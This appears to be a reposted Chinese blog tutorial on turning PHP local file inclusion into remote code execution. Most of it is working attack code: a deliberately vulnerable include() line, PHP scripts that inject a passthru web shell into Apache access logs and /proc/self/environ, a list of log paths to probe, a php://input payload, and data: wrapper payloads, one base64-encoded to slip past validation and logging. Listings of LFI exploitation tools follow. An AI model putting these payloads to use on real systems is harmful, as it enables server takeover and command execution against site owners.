利用php代码实现,利用PHP代码实现LFI2RCE

最新推荐文章于 2023-12-20 10:51:13 发布
最新推荐文章于 2023-12-20 10:51:13 发布
阅读量155 收藏
点赞数
文章标签: 利用php代码实现

之前曾写过一篇博文《LFI2RCE思路》:http://riusksk.blogbus.com/logs/34781127.html,本文主要是利用PHP代码来实现LFI2RCE,主要是看了《hack in zine》杂志之后学到的,这里顺便记录一下,但所使用的方法依然是上一博文中eb649e3928XkBK0p所提到的,即利用服务器上的相关记录文件来实现LFI2RCE。

在HIZ杂志中所用到的函数是passthru(http://cn2.php.net/passthru),主要还是为了实现一句话木马,当然也可使用exec 以及system等函数,三者之间的区别可参考《PHP 执行系统外部命令 system() exec() passthru()》:http://hi.baidu.com/cgeek/blog/item/fb9a1e4cd1bf1afdd62afc73.html

漏洞代码:  <?php include($_GET['content']); ?>  方法一:  请求代码如下:  <?php   $a = fsockopen("localhost",80);  fwrite ($a, "GET /<?php passthru(\$_GET['cmd']);?> HTTP/1.1\r\n".  "Host:localhost\r\n".  "Connection:Close\r\n\r\n");  fclose($a);  ?>  接下来再依据服务器的日志文件路径执行请求,比如aphche,可执行以下请求:  http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id  当然也可有其它日志文件路径,比如:  "/etc/httpd/logs/acces_log",  "/etc/httpd/logs/acces.log",  "/var/www/logs/access_log",  "/var/www/logs/access.log",  "/usr/local/apache/logs/access_log",  "/usr/local/apache/logs/access.log",  "/var/log/apache/access_log",  "/var/log/apache/access.log",  "/var/log/httpd/access_log",  "/var/log/httpd/access.log",  "D:/apps/Apache Group/Apache2/logs/access.log"

方法二:  另外,也可利用包含环境变量的文件:/proc/self/environ ,而此时我们将恶意代码插入到User-Agent header中,那么在代码就会被记录到以上文件中,具体代码如下:  <?php   $a=fsockopen("localhost",80);  fwrite($a,  "GET /../../../../proc/self/environ HTTP/1.1\r\n".  "User-Agent: <?php passthru(\$_GET['cmd']); ?> \r\n".  "Host: localhost \r\n".  "Connection: Close\r\n\r\n");  fclose($a);  ?>

方法三:  还有一种方法就是利用php://wrapper(http://www.php.net/wrappers.php),例如使用php://input来获取HTTP POST 请求中的原始数据并远程执行:  <?php   $request = "<?php passthru('id;'); ?>";  $req = "POST /index.php?content=php://input HTTP /1.1\r\n".  "Host:localhost\r\n".  "Content-type:text/html\r\n".  "Content-length:".strlen($request)."\r\n".  "Connection: Close\r\n\r\n".  "$request \r\n\r\n";  $a=fsockopen("localhost",80);  fwrite($a,$req);  echo $req;  while (!feof($a))  {  echo fgets($a,128);  }  fclose($a);  ?>

方法四:  利用"data:"wrapper(http://cn.php.net/manual/en/wrappers.data.php):  index.php?content=data:<?php system($_GET[c]); ?>?&c=dir  可再进行base64加密以绕过validation/sketchy logs:  index.php?content=data:;base64, \  PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

weixin_39963819
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现国密SM2算法(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
04-25 748
PHP实现国密SM2算法(附完整源码)
LFI_to_RCE
m0_63045593的博客
04-20 371
LFI_to_RCE 利用session.upload_progress进行文件包含 条件竞争 首先上传PHP_SESSION_UPLOAD_PROGRESS <?php session_start(); ?> 因为session.use_strict_mode默认值为off,所以这时我们可以自定义session id,比如在Cookie里设置PHPSESSID=flag,php就会在服务器上创建一个文件:/tmp/sess_flag,即使此时用户没有初始化se
文件管理
weixin_33939380的博客
07-31 103
文件系统结构元素:1.cent6.8和cent7两个版本的根目录不一样,实际上是同一个文件。/bin 和/usr/bin/sbin 和/usr/sbin/lib 和/usr/lib/lib64 和/usr/lib64 2.普通用户用bin root用户用sbin 普通用户即使能够查到sbin目录也无权限操作。3.b...
LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
cnbird's blog
06-24 1569
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/This paper exposes the ability from theattacker standpoint to use /proc in
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1665
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
[PHP]无需可控文件的LFI-RCE学习
feng的博客
01-05 2362
[PHP]无需可控文件的LFI-RCE学习 前言 昨天晚上P神的代码审计圈子里面提到了一个LFI的方法,题目来源是前段时间的HXPCTF中的题目includer's revenge。国外的一个师傅通过fuzz的方法通过iconv成功的将任意一个文件里的内容转换为一句话木马的方式,基本上可以说,PHP的LFI可能就到此为止了。 今天参考陆队的文章:https://tttang.com/archive/1395/,来学习一下思路和攻击方式。确实不得不说,nb。 这篇文章就只是大概记录一下学习的思路了,水一点因为
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
lfipwn:LFI扫描,漏洞利用工具
07-12
**LFIPWN:LFI漏洞扫描与利用工具详解** LFIPWN是一款基于Python编写的工具,专注于Local File Inclusion(LFI,本地文件包含)漏洞的扫描和利用。在网络安全领域,LFI漏洞允许攻击者通过Web应用程序读取服务器上的...
Kadimus:LFI 扫描和利用工具
06-18
卡迪姆斯LFI 扫描和利用工具编译:安装 libcurl: CentOS/Fedora # yum install libcurl-devel 基于 Debian # apt-get install libcurl4-openssl-dev安装 libpcre: CentOS/Fedora # yum install libpcre-devel 基于...
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
LFISploit:利用lfi +反向外壳+扫描器
04-01
**LFISploit:利用LFI、反向外壳与扫描器** LFISploit是一个针对本地文件包含(Local File Inclusion, LFI)漏洞的自动化工具,它允许黑客通过多种攻击策略来探测和利用系统中的漏洞。这个工具设计用于Windows、...
SM2,SM4,SM3,国密算法PHP
08-10
SM2,SM4,SM3,SM1 PHP版算法实现,亲测可用欢迎大家下载
From LFI to RCE!!(从本地文件包含到远程命令执行)
Websec
03-03 1576
翻译 原文:https://medium.com/bugbountywriteup/from-lfi-to-rce-96f352ec38c8 作者:Mohamed Sayed 漏洞类型:本地文件包含、远程命令执行 ........ 哈罗,伙伴们,这个主题我们将会讨论从本地文件包含变成远程命令执行的利用. 什么是LFI? 本地文件包含是某些Web应用程序中的漏洞,因为网站从服务器...
自动化LFI漏洞扫描攻击之LFI Suite
Fly_鹏程万里
05-23 3622
agdgsgdfgfsd
PHP SM2签名如何实现
Meiko的博客
03-22 5304
本文简要介绍了如何使用PHP实现SM2签名。通过使用php-gmssl库,我们可以轻松地为PHP项目添加SM2签名功能。希望这篇文章能够帮助你理解SM2签名以及如何在PHP实现它。
PHP sm2 国密扩展
qq_39316391的博客
08-09 8279
基于openssl密码库编写的SM2椭圆曲线公钥密码算法PHP扩展特性:非对称加密git地址:https://gitee.com/state-secret-series/openssl-ext-sm2.git。
招行收款通支付对接来了个国密sm2,sm3,文档也写得不完整,给的demo还是java,哎苦了我们php的,现在直接给出php版本
liumengxiao2的博客
07-13 3425
招行收款通支付对接来了个国密sm2,sm3,文档也写得不完整,给的demo还是java,哎苦了我们php的,现在直接给出php版本,还有招行支付回调
国密 sm2 算法在 php56 环境 thinkphp32 框架下的应用配置
leeyisoft的专栏
10-27 3287
国密算法 sm2 在 php56 环境 thinkphp32 框架下的应用配置(本人在 CentOS7 CentOS8 上面使用宝塔面板安装 php5.6 成功通过)
国密SM2生成公钥密钥/SM3进行加签
最新发布
锡林郭勒的凛冬的博客
12-20 1677
使用国密SM2和SM3引入Maven。首先开始生成SM2的公钥密钥。开始写自己的业务逻辑。
LFI to RCE
10-19
LFI to RCE是指通过本来只能访问服务器上的文件的漏洞(LFI),进一步利用该漏洞实现远程代码执行(RCE)。一般情况下,LFI漏洞只能让攻击者读取服务器上的文件,但是如果攻击者能够找到一个包含可执行代码的文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值